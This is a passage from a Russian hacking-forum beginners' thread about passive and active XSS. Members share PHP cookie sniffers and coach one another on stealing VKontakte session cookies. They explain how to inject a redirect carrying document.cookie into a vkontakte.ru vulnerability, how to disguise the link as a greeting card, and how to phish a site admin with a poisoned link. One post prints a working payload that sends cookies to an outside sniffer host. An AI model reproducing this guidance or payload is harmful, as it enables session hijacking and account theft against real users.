Рабочий снифер php Based Sniffer [phpBS] v2.3 © Kanick 2005 - просто установите на свой сервер с поддержкой php Скачать

или сниффер от уважаемого FRILL:

http://forum.xakep.ru/m_1546613/tm.htm

Кому все таки трудно понять, как настроить и юзать свой личный снифер на своем серваке - юзайте паблик web-снифер от KolPeeX http://forum.xakep.ru/m_1383557/tm.htm
Post #: 1
RE: Пассивные и Активные XSS - теория и практика - 2008-11-27 09:26:52.370000   
oRb

Сообщений: 4044
Оценки: 597
Присоединился: 2007-03-28 18:45:06.630000
Закрепляю.
PS: Форум из-за соображений безопасности каверкает слова: script, onload, onerror и т.д. Не ленитесь, переписывайете нужный вам код ручками.
Post #: 2
RE: Пассивные и Активные XSS - теория и практика - 2008-11-27 10:16:12.646666   
horiz

Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
Pashkela
Это как раз то, чего здесь не хватало.
Молодец! +2
Post #: 3
RE: Пассивные и Активные XSS - теория и практика - 2008-11-27 15:26:05.986666   
mactep.Black

Сообщений: 6065
Оценки: 678
Присоединился: 2008-02-28 13:01:19.656666
о, это именно то что мне нужно.
Post #: 4
RE: Пассивные и Активные XSS - теория и практика - 2008-11-27 19:37:13.656666   
Cheloveg

Сообщений: 102
Оценки: 0
Присоединился: 2008-07-14 12:07:39.023333
Наконец-то кто-то написал более подробно как использовать ксс"ку…
спс, щас буду тестировать!
Post #: 5
RE: Пассивные и Активные XSS - теория и практика - 2008-11-27 21:26:48.276666   
BeeLet89

Сообщений: 117
Оценки: 0
Присоединился: 2008-10-19 10:40:01.816666
Спс, чувак… . Можеш… :):):) +2
Post #: 6
RE: Пассивные и Активные XSS - теория и практика - 2008-11-27 23:37:13.436666   
AnDronY3K

Сообщений: 238
Оценки: 0
Присоединился: 2008-10-27 12:18:03.826666
quote:

о, это именно то что мне нужно.


И я того же мнения…..
Post #: 7
RE: Пассивные и Активные XSS - теория и практика - 2008-12-01 10:03:16.650000   
Дом0сеД

Сообщений: 4
Оценки: 0
Присоединился: 2008-12-01 02:59:31.310000

quote:

ORIGINAL: Cheloveg

Наконец-то кто-то написал более подробно как использовать ксс"ку…
спс, щас буду тестировать!

Подробнее некуда.
Круто!! пасиб!
Post #: 8
RE: Пассивные и Активные XSS - теория и практика - 2008-12-03 21:11:13.920000   
Haru6atoR

Сообщений: 18
Оценки: 0
Присоединился: 2008-10-18 16:33:02.380000
В данном случае cookies будут отправленны на сниифер http://www1.hut.ru/anek.shtml
вы сможете зайти на http://www1.hut.ru/aneksniff/sniffer.txt и увидеть перехваченные cookies

как это сделать?? эти ссылки не отображаются, напишите плз об этом поподробнее
Post #: 9
RE: Пассивные и Активные XSS - теория и практика - 2008-12-03 21:14:12.810000   
Pashkela

Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
"Рабочий снифер php Based Sniffer [phpBS] v2.3 © Kanick 2005 - просто установите на свой сервер с поддержкой php Скачать"

Последняя строчка в первом посте темы - рабочий сниффер, который надо установить на свой сервер с поддержкой php. например здесь: http://www.0fees.net/signup.php
Post #: 10
RE: Пассивные и Активные XSS - теория и практика - 2008-12-04 13:47:50.780000   
Haru6atoR

Сообщений: 18
Оценки: 0
Присоединился: 2008-10-18 16:33:02.380000
я зарегился, но все время пишет что нужен index.html загрузить на сайт с использованием FTP, загрузил и все равно пишет что нужен index.html
Post #: 11
RE: Пассивные и Активные XSS - теория и практика - 2008-12-04 13:53:23.596666   
Pashkela

Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
ну хз, попробуй другой хост. Проблемы с хостом уж сам как нибудь реши:)
Post #: 12
RE: Пассивные и Активные XSS - теория и практика - 2008-12-04 15:35:44.443333   
Haru6atoR

Сообщений: 18
Оценки: 0
Присоединился: 2008-10-18 16:33:02.380000
а может я че то не так делаю*??, не туда гружу или не то, можешь написать как это делать пожалуйста
Post #: 13
RE: Пассивные и Активные XSS - теория и практика - 2008-12-10 17:57:32.053333   
свининка

Сообщений: 9
Оценки: 0
Присоединился: 2008-12-08 01:52:35.466666
Скрипт пихнул в тело страницы на которой поздравительная открыточка (открытку разместил на народе), получил куки, НО сниффер даёт куки содержащую информацию о странице на которой моё поздравление! А на фига мне это нужно?
Таким образом, задача заключается в следующем:
отсылаю поздравление, в виде ссылки (скажем в контакт), получаю куки из (контакта).
Как это сделать, если сниффер даёт последнюю куки?
Спс за внимание.

P.S.: Спасибо brtn.
(Мой предыдущий вопрос заключался в следующем: не мог сообразить куда пихать скрипт).
Post #: 14
RE: Пассивные и Активные XSS - теория и практика - 2008-12-10 20:04:54.010000   
koro

Сообщений: 977
Оценки: 0
Присоединился: 2008-08-08 09:39:07.460000
Полезная инфа для тех кто освоил эту:
http://www.dsec.ru/about/articles/web_xss/
Post #: 15
RE: Пассивные и Активные XSS - теория и практика - 2008-12-10 20:07:22.433333   
koro

Сообщений: 977
Оценки: 0
Присоединился: 2008-08-08 09:39:07.460000
quote:

Не пойму куда пихать скрипт "картинки".

хны, ну нельзя же так. Пихай её на страницу сайта чтобы была видна всем! если пассив нашёл то пихай туда где нашёл,а потом кидай сцыль жертве
Post #: 16
RE: Пассивные и Активные XSS - теория и практика - 2008-12-10 20:26:36.500000   
свининка

Сообщений: 9
Оценки: 0
Присоединился: 2008-12-08 01:52:35.466666
Так все таки надо создавать "заряженную" картинку, чтоб получить результат или можно обойтись скриптом в теле страницы на которую даётся ссылка?
То есть, скрипт должен исполняться с интересующей меня страницы юзера или можно его запустить после перехода по ссылке? Речь идёт не о троянах, а о "легальных" скриптах.

(Это к тому, что сниффер даёт мне последний кукис).
Post #: 17
RE: Пассивные и Активные XSS - теория и практика - 2008-12-10 21:08:04.050000   
koro

Сообщений: 977
Оценки: 0
Присоединился: 2008-08-08 09:39:07.460000
quote:

скрипт должен исполняться с интересующей меня страницы юзера или можно его запустить после перехода по ссылке?

яваскрипт должен выполняться на интересующем тебя сайте, а ссылку куда собираешся ему кинуть?
quote:

(Это к тому, что сниффер даёт мне последний кукис).

а предпоследний не даёт?
Post #: 18
RE: Пассивные и Активные XSS - теория и практика - 2008-12-10 21:08:46.706666   
Pashkela

Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000

quote:

ORIGINAL: свининка
(Это к тому, что сниффер даёт мне последний кукис).


Не последний, а с той страницы, с которой пришлепали на скрипт. А чтобы правильно пришлепали, надо в ТОЙ странице, ОТКУДА пришлепали, вставить в ссылку ТОЙ страницы или в КОД той страницы ПЕРЕАДРЕСАЦИЮ на снифер, а в конце еще обязательно дописать +document.cookie;

Предугадывая возможный следующий вопрос - НЕТ, история -1 не прокручивается в вопросах тыренья кук, это основы безопасности любого браузера. Сайт может быть уязвимым, это личное дело хозяина сайта, браузер - фиг. Вернее может, но гораздо реже и не в таких уж вопросах
Post #: 19
RE: Пассивные и Активные XSS - теория и практика - 2008-12-10 21:13:30.143333   
koro

Сообщений: 977
Оценки: 0
Присоединился: 2008-08-08 09:39:07.460000
quote:

ТОЙ странице, ОТКУДА пришлепали, вставить в ссылку ТОЙ страницы или в КОД той страницы ПЕРЕАДРЕСАЦИЮ на снифер, а в конце еще обязательно дописать +document.cookie;

[sm=ag.gif] лично я задумался
Post #: 20
RE: Пассивные и Активные XSS - теория и практика - 2008-12-10 21:42:20.516666   
свининка

Сообщений: 9
Оценки: 0
Присоединился: 2008-12-08 01:52:35.466666
Задача: стырить кукис из контакта.

1. Файл к сообщению не прикрепить т.е. можно дать только ссылку.
2. Если дать ссылку на страницу на которой редирект на сниффер получим куки страницы на которую дали ссылку. Не катит.

Таким образом нужно отсылать сразу на сниффер, откуда редиректнуть на замануху.
Я правильно понял?

Спс за комменты.
Post #: 21
RE: Пассивные и Активные XSS - теория и практика - 2008-12-10 21:57:22.880000   
Pashkela

Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
quote:

ORIGINAL: свининка
Таким образом нужно отсылать сразу на сниффер, откуда редиректнуть на замануху.
Я правильно понял?


Умница. Только это уже не замануха по сути, а лицо заманухи. Картинко, сайт и т.д.

НО!!! При этом XSS надо вставлять в найденную уязвимость на самом КОНТАКТЕ. Т.е. начинаться ссылка должна с http://vkontakte.ru/

Вывод - как пример, идет переадресация на снифер, а потом сразу на страничку в контакте, тогда ссылка особых подозрений не вызовет

Чтобы совсем понятно было, +document.cookie; заберет куки с того сайта, с чего начинается САМА ссылка, содержащая +document.cookie;

В твоем случае это очевидно, что ссылка должна начинаться с http://vkontakte.ru/

ЗЫЖ Ппц, утомился
Post #: 22
RE: Пассивные и Активные XSS - теория и практика - 2008-12-10 21:59:52.756666   
koro

Сообщений: 977
Оценки: 0
Присоединился: 2008-08-08 09:39:07.460000
нет не правильно
"Прежде чем на чужие программы ругаться надо в них сначала хорошенько разобраться" © 1C
Прежде чем контакт на кукисы кидать(т.е. пользователей контакта), надо хорошенько разобраться как это делается с любым другим сайтом.
по теме, перечитай статью, внимательно, с растановкой, чтобы каждое действие стало понятно.
Post #: 23
RE: Пассивные и Активные XSS - теория и практика - 2008-12-11 00:28:49.343333   
свининка

Сообщений: 9
Оценки: 0
Присоединился: 2008-12-08 01:52:35.466666
Забодяжил сорок литров кофе, ушел искать уязвимость в контакте.
Интересно, существуют другие способы?
Post #: 24
RE: Пассивные и Активные XSS - теория и практика - 2008-12-11 00:41:57.303333   
Pashkela

Сообщений: 3756
Оценки: 736
Присоединился: 2007-01-03 06:19:40.900000
quote:

ORIGINAL: свининка
Забодяжил сорок литров кофе, ушел искать уязвимость в контакте.


О, дошло таки:)

quote:

ORIGINAL: свининка
Интересно, существуют другие способы?


нет

ЗЫ: XSS - суть взлом
Post #: 25
RE: Пассивные и Активные XSS - теория и практика - 2008-12-11 07:06:17.390000   
GoldCode

Сообщений: 74
Оценки: 0
Присоединился: 2008-11-24 07:17:56.360000

quote:

ORIGINAL: brtn
Полезная инфа для тех кто освоил эту:
http://www.dsec.ru/about/articles/web_xss/


понятно, почему не выполняеться код который я дописываю при помощи программы WinHex, у ковонибуть получилось?
Post #: 26
RE: Пассивные и Активные XSS - теория и практика - 2008-12-11 12:53:24.483333   
gromoza

Сообщений: 698
Оценки: 0
Присоединился: 2008-08-03 08:52:56.196666
quote:

понятно, почему не выполняеться код который я дописываю при помощи программы WinHex, у ковонибуть получилось?

че чем? winhex ? Это же вроде редактор файлов.
Post #: 27
RE: Пассивные и Активные XSS - теория и практика - 2008-12-11 21:29:22.736666   
свининка

Сообщений: 9
Оценки: 0
Присоединился: 2008-12-08 01:52:35.466666
Ликвидировал пост. Судя по тому, что форумчане, отзывчивые люди, в данном случае молчат, может означать две вещи:
1. Я прогнал такую чушь, что и сказать нечего.
2. Я рядом с собакой зарытой.
Ковыряемся дальше.

P.S.: Видели в контакте игру "Мафия"? Я чуть со стула не упал.
Post #: 28
RE: Пассивные и Активные XSS - теория и практика - 2008-12-12 05:20:28.810000   
GoldCode

Сообщений: 74
Оценки: 0
Присоединился: 2008-11-24 07:17:56.360000
quote:

ORIGINAL: gromoza
quote:

понятно, почему не выполняеться код который я дописываю при помощи программы WinHex, у ковонибуть получилось?

че чем? winhex ? Это же вроде редактор файлов.


ну скажи как грамотно отредактировать файл что бы он отображался? И при этом была возможность исполнить код!?
Post #: 29
RE: Пассивные и Активные XSS - теория и практика - 2008-12-12 12:55:30.706666   
gromoza

Сообщений: 698
Оценки: 0
Присоединился: 2008-08-03 08:52:56.196666
quote:

ну скажи как грамотно отредактировать файл что бы он отображался? И при этом была возможность исполнить код!?

Вообще причём тут XSS ???
Post #: 30
RE: Пассивные и Активные XSS - теория и практика - 2008-12-12 13:27:24.360000   
The Joker

Сообщений: 3485
Оценки: 99
Присоединился: 2008-10-07 16:22:13.730000

quote:

ORIGINAL: gromoza

quote:

ну скажи как грамотно отредактировать файл что бы он отображался? И при этом была возможность исполнить код!?

Вообще причём тут XSS ???

Следует думать, что человек хочет добавить злобный скрипт внутрь графического файла. Говорят, такое иногда катит.
Post #: 31
RE: Пассивные и Активные XSS - теория и практика - 2008-12-12 19:10:40.810000   
IkeT

Сообщений: 101
Оценки: 0
Присоединился: 2008-12-07 23:54:11.183333
quote:

Следует думать, что человек хочет добавить злобный скрипт внутрь графического файла. Говорят, такое иногда катит.

если руки из правильного места то частенько катит
Post #: 32
RE: Пассивные и Активные XSS - теория и практика - 2008-12-12 19:48:13.686666   
GoldCode

Сообщений: 74
Оценки: 0
Присоединился: 2008-11-24 07:17:56.360000
quote:

ORIGINAL: gromoza
quote:

ну скажи как грамотно отредактировать файл что бы он отображался? И при этом была возможность исполнить код!?

Вообще причём тут XSS ???


так ты почитай http://www.dsec.ru/about/articles/web_xss/


Работает только в ослике в остальных не катит!
Post #: 33
RE: Пассивные и Активные XSS - теория и практика - 2009-01-02 00:34:58.460000   
Jarull

Сообщений: 358
Оценки: 0
Присоединился: 2007-04-04 21:08:21.733333
Нашел на сайте XSS создал запрос…..а когда начал тестить понял что не хочет из моего запроса ссылка получаться…… вместо текста на который можно нажать получается просто полный текст типа [url=http://site.ru/admin.php/%3E%22%3E%3CScRiPt%3Evar%20Xcook=;document.images[0].src='http://snf.site.ru/img.php%3F'+Xcook%3C/ScRiPt%3E] My Web page ……то есть получается что по ссылке не перейти и значит кукисов не получить…… как сделать чтобы ссылка получилась ????
Post #: 34
RE: Пассивные и Активные XSS - теория и практика - 2009-01-02 01:23:18.423333   
RaDostnaUA

Сообщений: 110
Оценки: 0
Присоединился: 2008-12-28 01:48:08.470000
ТС спс… После твоего поста начались большие труды маленьких человечков_)
Post #: 35
RE: Пассивные и Активные XSS - теория и практика - 2009-01-02 17:54:23.556666   
horiz

Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
Jarull
Опиши более подробно, что куда пихал, на что нажимал, что получал.
Post #: 36
RE: Пассивные и Активные XSS - теория и практика - 2009-01-09 13:27:46.246666   
vidden

Сообщений: 3
Оценки: 0
Присоединился: 2008-12-21 23:43:38.540000
Друзья, подскажите, пожалуйста. Я вроде бы нашел на сайте xss уязвимость. Когда вставляю в форму поиска "><sсriрt>alert()</sсriрt>, выскакивает Javascript окошко, но это всего лишь новостной сайт, не форум, не гостевуха, здесь я не могу оставить свое сообщение. Скажите, можно что-то поиметь с этой уязвимости?
Post #: 37
RE: Пассивные и Активные XSS - теория и практика - 2009-01-09 13:55:17.510000   
Crack_key

Сообщений: 99
Оценки: 0
Присоединился: 2009-01-04 22:05:21.960000
+1
Post #: 38
RE: Пассивные и Активные XSS - теория и практика - 2009-01-09 18:25:10.593333   
horiz

Сообщений: 892
Оценки: 0
Присоединился: 2008-11-03 18:33:09.006666
vidden
Можно угнать пароли админа. Пишешь админу письмо, что, например поисковик глючит, и дай ему ядовитую ссылочку (которую можно замаскировать). Ну а дальше - дело техники. Но, правда если админ умный, он не клюнет. Больше из пассивной XSS ты врятли что выжмешь.
Post #: 39
RE: Пассивные и Активные XSS - теория и практика - 2009-01-09 19:34:41.220000   
papst

Сообщений: 315
Оценки: 0
Присоединился: 2008-11-19 22:17:57.653333
Pashkela - вот на http://na-s.ru там есть xss снифер…и с помощью открытки на mail.ru можно стащить cookies…надо послать жертве открытку со снифером как ето ???
и чтоб стащить cookies…
Post #: 40
Страниц:  [1] 2 3 4 5
Все форумы >> [Для начинающих] >> Пассивные и Активные XSS - теория и практика







Связаться:
Вопросы по сайту / xakep@glc.ru

Предупреждение: использование полученных знаний в противозаконных целях преследуется по закону.